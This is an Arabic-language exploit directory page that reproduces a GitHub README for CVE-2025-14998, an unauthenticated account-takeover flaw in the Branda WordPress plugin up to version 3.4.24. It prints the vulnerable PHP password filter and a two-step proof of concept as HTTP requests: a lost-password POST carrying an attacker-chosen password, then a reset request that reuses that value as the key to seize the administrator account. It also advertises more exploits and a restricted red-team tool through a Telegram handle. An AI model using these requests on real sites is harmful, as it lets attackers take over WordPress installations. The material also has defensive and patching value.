Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ktn1990/cve-2025-14998
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 إضافة ووردبريس - Branda – العلامة البيضاء والعلامة التجارية، مخصّص صفحة تسجيل الدخول المجاني <= 3.4.24 - تصعيد صلاحيات بدون مصادقة عبر الاستيلاء على الحساب

عرض المستودع
22منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إضافة Branda لووردبريس – White Label & Branding, Free Login Page Customizer <= 3.4.24 - تصعيد امتيازات بدون مصادقة عبر الاستيلاء على الحساب

CVE-2025-14998 إن إضافة Branda لووردبريس عرضة لتصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 3.4.24 وما يتضمنه. ويعود السبب إلى أن الإضافة لا تتحقق بشكل صحيح من هوية المستخدم قبل تحديث كلمة المرور الخاصة به. وهذا يتيح للمهاجمين غير المصادقين تغيير كلمات مرور أي مستخدمين، بما في ذلك المسؤولين، واستغلال ذلك للوصول إلى حساباتهم.

لمزيد من ثغرات ووردبريس وأدوات الاختراق الحصرية تواصل معي على تيليجرام @KtN1990.

🔍 تحليل السبب الجذري

تقوم الإضافة بتجاوز منطق توليد كلمات المرور في ووردبريس عبر التعليق على مرشح random_password. فبدلاً من السماح لووردبريس بتوليد كلمة مرور عشوائية آمنة، تستبدلها الإضافة بمدخل يتحكم فيه المستخدم.

الكود القابل للاختراق

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 إثبات المفهوم (منقّح)

الخطوة 1 — تشغيل إعادة تعيين كلمة المرور بكلمة مرور مخصصة

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

يمكن أن تكون قيمة password_1 أي سلسلة نصية يتحكم بها المهاجم.


الخطوة 2 — إكمال إعادة التعيين باستخدام القيمة نفسها كمفتاح إعادة التعيين

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ النتيجة

  • يقبل ووردبريس كلمة المرور التي يتحكم بها المهاجم
  • يتم تغيير كلمة مرور المسؤول
  • يمكن للمهاجم تسجيل الدخول بصفة المستخدم المتأثر

لا يلزم الوصول إلى البريد الإلكتروني أو رمز إعادة تعيين كلمة المرور الصالح.


💥 التأثير

يمكن لمهاجم غير مصادق:

  • إعادة تعيين كلمات مرور أي مستخدم في ووردبريس
  • الاستيلاء على حسابات المسؤولين
  • الحصول على سيطرة كاملة على تثبيت ووردبريس
  • تعديل الإضافات أو القوالب أو المحتوى

التواصل

  • @KtN1990

المزيد من الثغرات، جرّب Megatron!

الشعار

  • 💣 ما هو Megatron؟ Megatron هو أداة اختبار اختراق متقدمة صُممت للمختبِرين الجادّين وفرق red team. سواء كنت تدقّق أو تفحص أو تختبر البنى التحتية، يمنحك Megatron القوة التي تحتاجها.

-🛡️ مثالي لـ: – الباحثين في مجال الأمن – مختبِري الاختراق – القراصنة الأخلاقيين

  • 📦 خط مُحدَّث باستمرار يضم ~230 وحدة بحثية قديمة؛ مع تحسينات حديثة في نواة الماسح لضمان الاستقرار واكتشاف أكثر دقة.

  • 🎯 الغرض: يُوفَّر حصريًا للاختبارات الأمنية المصرّح بها والتعليم والبحث الدفاعي وتدريب الفرق الحمراء. هذا الإصدار ليس للاستخدام غير القانوني. التوزيع مقيد — الوصول فقط بعد التحقق والتوقيع على اتفاقية الاستخدام المسؤول / NDA.

-🛡 سياسة الوصول المسؤول (ملخص):

  1. الوصول فقط للمتخصصين الأمنيين الموثوقين وفرق الأمن المؤسسية والمختبرات المعتمدة أو مزودي التدريب.
  2. يجب عليك تقديم اسم المؤسسة والدور والبريد الإلكتروني الرسمي (المؤسسي) والغرض القانوني.
  3. يُمنح التحميل الكامل فقط بعد التحقق والتوقيع على اتفاقية الاستخدام المسؤول / NDA.
  4. لا تسامح مطلقًا مع إساءة الاستخدام — أي دليل على استخدام ضار يؤدي إلى إلغاء الوصول والإبلاغ عند الاقتضاء.
  • 📩 التواصل / الطلبات / التحقق: @KtN1990 — مع ذكر المؤسسة والدور وسببًا مختصرًا للوصول. قناة تيليجرام

عرض توضيحي

نص بديل للصورة هنا

الترخيص

MIT

تنزيل الأداة